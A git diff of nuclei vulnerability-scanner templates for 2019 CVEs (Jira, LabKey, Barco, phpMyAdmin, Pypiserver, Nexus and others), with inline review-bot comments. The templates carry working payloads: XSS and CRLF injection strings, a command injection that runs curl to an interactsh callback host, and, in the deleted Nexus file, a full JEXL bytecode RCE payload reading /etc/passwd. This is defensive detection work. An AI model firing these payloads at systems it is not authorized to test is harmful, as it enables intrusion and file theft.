-# Turning the feature off will not affect existing filters and dashboards.
-# If you change this setting, you will still need to update the existing filters and dashboards if they have already been
-# shared publicly.
-# Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced.
diff --git a/nuclei-templates/CVE-2019/CVE-2019-3402.yaml b/nuclei-templates/CVE-2019/CVE-2019-3402.yaml
new file mode 100644
index 0000000000..ce14735982
--- /dev/null
+++ b/nuclei-templates/CVE-2019/CVE-2019-3402.yaml
@@ -0,0 +1,29 @@
+id: CVE-2019-3402
+
+info:
+ name: Jira - Reflected XSS using searchOwnerUserName parameter.
+ author: pdteam
+ severity: medium
+ description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
+ reference: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
+ tags: cve,cve2019,atlassian,jira,xss
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2019-3402
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - ""
+ part: body
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2019/cve-2019-3799.yaml b/nuclei-templates/CVE-2019/CVE-2019-3799.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-3799.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-3799.yaml
diff --git a/nuclei-templates/CVE-2019/CVE-2019-3911.yaml b/nuclei-templates/CVE-2019/CVE-2019-3911.yaml
index eee6c098ba..0d1bd780bb 100644
--- a/nuclei-templates/CVE-2019/CVE-2019-3911.yaml
+++ b/nuclei-templates/CVE-2019/CVE-2019-3911.yaml
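Review bot: The body word matcher in the new CVE-2019-3402 template is an empty string (`- ""`), which matches any 200 response and would flag every reachable Jira as vulnerable; the deleted CVE-2019-7219 and CVE-2019-3401 files in this patch show the same empty `""`/`''` words, which suggests the HTML marker was stripped in rendering, so confirm the committed file actually contains the reflected marker it is meant to look for. `reference:` is a bare scalar (`reference: https://gist.github.com/...`) where every other template here uses the list form, and `cvss-score: 6.10` uses the two-decimal style that CVE-2019-3911 in this same commit corrects to `6.1`. The file is also written without a trailing newline.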
@@ -1,23 +1,34 @@ id: CVE-2019-3911 info: - name: LabKey Server < 18.3.0 - XSS + name: LabKey Server Community Edition <18.3.0 - Cross-Site Scripting author: princechaddha severity: medium - description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror parameter in the /__r2/query endpoints. + description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate this vulnerability. 
reference: - https://www.tenable.com/security/research/tra-2019-03 - - https://www.cvedetails.com/cve/CVE-2019-3911 - metadata: - shodan-query: "Server: Labkey" - tags: cve,cve2019,xss,labkey + - https://nvd.nist.gov/vuln/detail/CVE-2019-3911 + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2019-3911 cwe-id: CWE-79 + epss-score: 0.00195 + epss-percentile: 0.5643 + cpe: cpe:2.3:a:labkey:labkey_server:*:*:community:*:*:*:*:* + metadata: + max-request: 1 + vendor: labkey + product: labkey_server + shodan-query: 'Server: Labkey' + tags: cve,cve2019,xss,labkey,tenable -requests: +http: - method: GET path: - '{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL' @@ -37,3 +48,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100b986602e44e57d8dd80c107ede7843f1cf0bb5790402f300905465fe2166ec9f022067793b03e1155326998b4f5f27ea33968571672da4690ab1a1238b9435488da4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-3912.yaml b/nuclei-templates/CVE-2019/CVE-2019-3912.yaml deleted file mode 100644 index 6861b43f27..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-3912.yaml +++ /dev/null 
@@ -1,29 +0,0 @@
-id: CVE-2019-3912
-
-info:
- name: LabKey Server < 18.3.0 - Open redirect
- author: 0x_Akoko
- severity: medium
- description: An open redirect vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 via the /__r1/ returnURL parameter allows an unauthenticated remote attacker to redirect users to arbitrary web sites.
- reference:
- - https://www.tenable.com/security/research/tra-2019-03
- - https://www.cvedetails.com/cve/CVE-2019-3912
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
- cve-id: CVE-2019-3912
- cwe-id: CWE-601
- metadata:
- shodan-query: "Server: Labkey"
- tags: cve,cve2019,redirect,labkey
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com'
-
- matchers:
- - type: regex
- part: header
- regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/nuclei-templates/CVE-2019/CVE-2019-3929.yaml b/nuclei-templates/CVE-2019/CVE-2019-3929.yaml
index 6c39d5fddb..4dd148b3e1 100644
--- a/nuclei-templates/CVE-2019/CVE-2019-3929.yaml
+++ b/nuclei-templates/CVE-2019/CVE-2019-3929.yaml
@@ -1,6 +1,7 @@ id: CVE-2019-3929 + info: - name: Barco/AWIND OEM Presentation Platform - Remote Command Injection + name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929) author: _0xf4n9x_ severity: critical description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root. @@ -8,25 +9,25 @@ info: - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html - https://www.exploit-db.com/exploits/46786/ - https://nvd.nist.gov/vuln/detail/CVE-2019-3929 - - https://www.tenable.com/security/research/tra-2019-20 + tags: rce,cve,cve2019,oast,injection classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2019-3929 cwe-id: CWE-78 - tags: rce,cve,cve2019,oast,injection + requests: - method: POST path: - "{{BaseURL}}/cgi-bin/file_transfer.cgi" + body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2bhttp%3a//{{interactsh-url}}Pa_Note%27" headers: Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/05/03 
diff --git a/nuclei-templates/CVE-2019/cve-2019-5127.yaml b/nuclei-templates/CVE-2019/CVE-2019-5127.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-5127.yaml rename to nuclei-templates/CVE-2019/CVE-2019-5127.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-5434.yaml b/nuclei-templates/CVE-2019/CVE-2019-5434.yaml index df387d8a6e..aabe21db32 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-5434.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-5434.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Revive Adserver 4.2 is susceptible to remote code execution. An attacker can send a crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. This can be exploited to perform various types of attacks, e.g. serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third-party websites. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system. remediation: | Apply the latest security patches or upgrade to a newer version of Revive Adserver. reference: @@ -19,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-5434 cwe-id: CWE-502 - epss-score: 0.28703 - epss-percentile: 0.9638 + epss-score: 0.3278 + epss-percentile: 0.96917 cpe: cpe:2.3:a:revive-sas:revive_adserver:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: revive-sas product: revive_adserver shodan-query: http.favicon.hash:106844876 - tags: edb,packetstorm,cve,cve2019,revive,adserver,rce + tags: cve,cve2019,edb,packetstorm,revive,adserver,rce,revive-sas http: - raw: 
@@ -58,4 +60,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022002cfcc9959bf593642104dd6a46966cc381d8f714cb82e0194c6e3648082dca80220706cbd8ea9bcb3b7346207480e4ea34e53edbf71085e0599d213b475116bc9ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d063d3e6f828763a627b1c547a29398d9d3271ba2577e671a648cfa9ffea26dd02207154351fd5498fdfc5b7bf9595690e8824b334442ccf2bbc53f4137aa14e6971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-6715.yaml b/nuclei-templates/CVE-2019/CVE-2019-6715.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-6715.yaml rename to nuclei-templates/CVE-2019/CVE-2019-6715.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-6799.yaml b/nuclei-templates/CVE-2019/CVE-2019-6799.yaml index 400d2d6903..697808948e 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-6799.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-6799.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files. remediation: | Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability. reference: @@ -19,8 +21,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 5.9 cve-id: CVE-2019-6799 - epss-score: 0.13969 - epss-percentile: 0.95103 + epss-score: 0.1829 + epss-percentile: 0.96069 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: verified: true 
@@ -30,7 +32,7 @@ info: shodan-query: title:"phpmyadmin" fofa-query: body="pma_servername" && body="4.8.4" hunter-query: app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive + tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli http: - raw: @@ -101,4 +103,4 @@ http: - "X-Powered-By: PHP/([0-9.]+)" internal: true part: header -# digest: 490a00463044022058ce9f355e6a14d3fd8f0d6403bd0dffd899817ada9a41d537446fc82d149b360220798311904c6e5beeed583e044df4efa69429c1b1428ec012fca57ca9a41a50af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f236d158d8c90c01829fc76b9cf88685ed1b1987354c5f52f456093e540f12a402200d0ba2a6199fd82fb2d4dbbf0d7ec82fab8b799702f0fc891d340211793ac723:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-6802.yaml b/nuclei-templates/CVE-2019/CVE-2019-6802.yaml index 17c25558ee..256e3eeb8a 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-6802.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-6802.yaml 
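Review bot: The `sqli` tag added in the `@@ -30,7 +32,7 @@` hunk does not describe this template: per its own description CVE-2019-6799 is a file read through a rogue MySQL server and the `mysql.allow_local_infile` setting, which the existing `lfr` tag already covers, not SQL injection, so the tag would pull this intrusive check into sqli-filtered runs where it does not belong; keep `tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive`. The remaining hunks in the section are the generic impact text, an EPSS refresh and the digest. The request block starts after this hunk, so the matching logic itself is not visible here.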
@@ -1,32 +1,43 @@ id: CVE-2019-6802 info: - name: Pypiserver 1.2.5 - CRLF Injection + name: Pypiserver <1.2.5 - Carriage Return Line Feed Injection author: 0x_Akoko severity: medium description: | - CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI + Pypiserver through 1.2.5 and below is susceptible to carriage return line feed injection. An attacker can set arbitrary HTTP headers and possibly conduct cross-site scripting attacks via a %0d%0a in a URI. + remediation: | + Upgrade to Pypiserver version 1.2.5 or later. reference: - https://vuldb.com/?id.130257 - - https://nvd.nist.gov/vuln/detail/CVE-2019-6802 - https://github.com/pypiserver/pypiserver/issues/237 + - https://nvd.nist.gov/vuln/detail/CVE-2019-6802 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-6802 - cwe-id: CWE-79,CWE-74 + cwe-id: CWE-74 + epss-score: 0.00113 + epss-percentile: 0.43845 + cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: python + product: pypiserver shodan-query: html:"pypiserver" - verified: "true" - tags: cve,cve2019,crlf,generic,pypiserver + tags: cve,cve2019,crlf,pypiserver,python -requests: +http: - method: GET path: - "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;" matchers: - - type: word + - type: regex part: header - words: - - 'Set-Cookie: crlfinjection=1;' + regex: + - "^Set-Cookie: crlfinjection=1;" +# digest: 4b0a00483046022100b16ea55a337e17fdeb0193ad059d9f3556559826d3d9b7110ec51f9e15d266d4022100ee15738e338dcc606c28c92349ff94f11a276dee860966f3e460c235495bda74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
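Review bot: The version statements in the rewritten CVE-2019-6802 info block contradict each other: the name says `Pypiserver <1.2.5`, the description says `through 1.2.5 and below` (which is also redundant), and the new remediation says `Upgrade to Pypiserver version 1.2.5 or later`; at most one of these can be right, so reconcile them against the linked pypiserver issue before merging — the removed description read "1.2.5 and below", which would put the fix in the release after 1.2.5. Separately, the new header matcher `^Set-Cookie: crlfinjection=1;` has no multiline flag; unless nuclei evaluates `part: header` per line, `^` only matches when Set-Cookie happens to be the first header, whereas the CVE-2019-3912 template removed in this same patch anchors its Location check with `(?m)^`, so `- "(?m)^Set-Cookie: crlfinjection=1;"` is the safer form. The narrowing of `cwe-id` from `CWE-79,CWE-74` to `CWE-74` is consistent with the description treating XSS only as a possible consequence.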
diff --git a/nuclei-templates/CVE-2019/CVE-2019-7219.yaml b/nuclei-templates/CVE-2019/CVE-2019-7219.yaml
deleted file mode 100644
index 76246d7d9a..0000000000
--- a/nuclei-templates/CVE-2019/CVE-2019-7219.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2019-7219
-info:
- name: Zarafa WebApp Reflected XSS
- author: pdteam
- severity: medium
- description: |
- Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
- reference:
- - https://github.com/verifysecurity/CVE-2019-7219
- - https://stash.kopano.io/repos?visibility=public
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2019-7219
- cwe-id: CWE-79
- tags: cve,cve2019,zarafa,xss
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E'
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - ""
- - type: word
- part: header
- words:
- - "text/html"
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2019/CVE-2019-7238.yaml b/nuclei-templates/CVE-2019/CVE-2019-7238.yaml
deleted file mode 100644
index 43dd90ddad..0000000000
--- a/nuclei-templates/CVE-2019/CVE-2019-7238.yaml
+++ /dev/null
@@ -1,21 +0,0 @@ -id: CVE-2019-7238 -info: - name: Nexus Repository Manager RCE - author: medbsq - severity: high -# https://www.cvebase.com/cve/2018/18264 -requests: - - method: POST - path: - - "{{BaseURL}}/service/extdirect" - headers: - body: "{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6
176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a617
6612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad0
03500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}" - matchers-condition: and - matchers: - - type: word - words: - - "root:" - part: body - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-7255.yaml b/nuclei-templates/CVE-2019/CVE-2019-7255.yaml index f754c57f8b..9a0ccd103b 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-7255.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-7255.yaml 
@@ -6,22 +6,33 @@ info: severity: medium description: | Linear eMerge E3-Series devices are vulnerable to cross-site scripting via the 'layout' parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://www.applied-risk.com/resources/ar-2019-005 - https://applied-risk.com/labs/advisories - https://packetstormsecurity.com/files/155253/Linear-eMerge-E3-1.00-06-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-7255 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-7255 cwe-id: CWE-79 + epss-score: 0.01232 + epss-percentile: 0.85132 + cpe: cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: nortekcontrol + product: linear_emerge_essential_firmware shodan-query: http.title:"eMerge" - verified: "true" - tags: emerge,xss,packetstorm,cve,cve2019,nortek + tags: cve,cve2019,emerge,xss,packetstorm,nortek,nortekcontrol -requests: +http: - method: GET path: - "{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -41,5 +52,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs on 2022/09/08 +# digest: 4b0a00483046022100d2ca585bfa1e478670a139dba643afbc320c5036cd04ad9a0b7bb8ed9eee267f02210089d1ea3ca08cf877349adc37c199ddd68e4b7191d459e3411637dc7dfab55fd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-7315.yaml b/nuclei-templates/CVE-2019/CVE-2019-7315.yaml index 0bdd73e572..7e2cb32f90 100644 
--- a/nuclei-templates/CVE-2019/CVE-2019-7315.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-7315.yaml @@ -1,13 +1,13 @@ id: CVE-2019-7315 info: - name: Genie Access WIP3BVAF IP Camera - Local File Inclusion + name: Genie Access WIP3BVAF IP Camera - Directory Traversal author: 0x_Akoko severity: high - description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to local file inclusion via the web interface, as demonstrated by reading /etc/shadow. + description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to directory traversal via the web interface, as demonstrated by reading /etc/shadow. reference: - https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/ - https://vuldb.com/?id.136593 - - https://nvd.nist.gov/vuln/detail/CVE-2019-7315 + - https://www.cvedetails.com/cve/CVE-2019-7315 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 @@ -27,5 +27,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/08 diff --git a/nuclei-templates/CVE-2019/CVE-2019-7543.yaml b/nuclei-templates/CVE-2019/CVE-2019-7543.yaml index d10b28faec..fd87d15c32 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-7543.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-7543.yaml @@ -1,4 +1,5 @@ id: CVE-2019-7543 + info: name: KindEditor 4.1.11, the php/demo.php - (XSS) author: pikpikcu @@ -7,12 +8,13 @@ info: reference: - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor - https://nvd.nist.gov/vuln/detail/CVE-2019-7543 + tags: cve,cve2019,kindeditor,xss classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2019-7543 cwe-id: CWE-79 - tags: cve,cve2019,kindeditor,xss + requests: - method: POST path: 
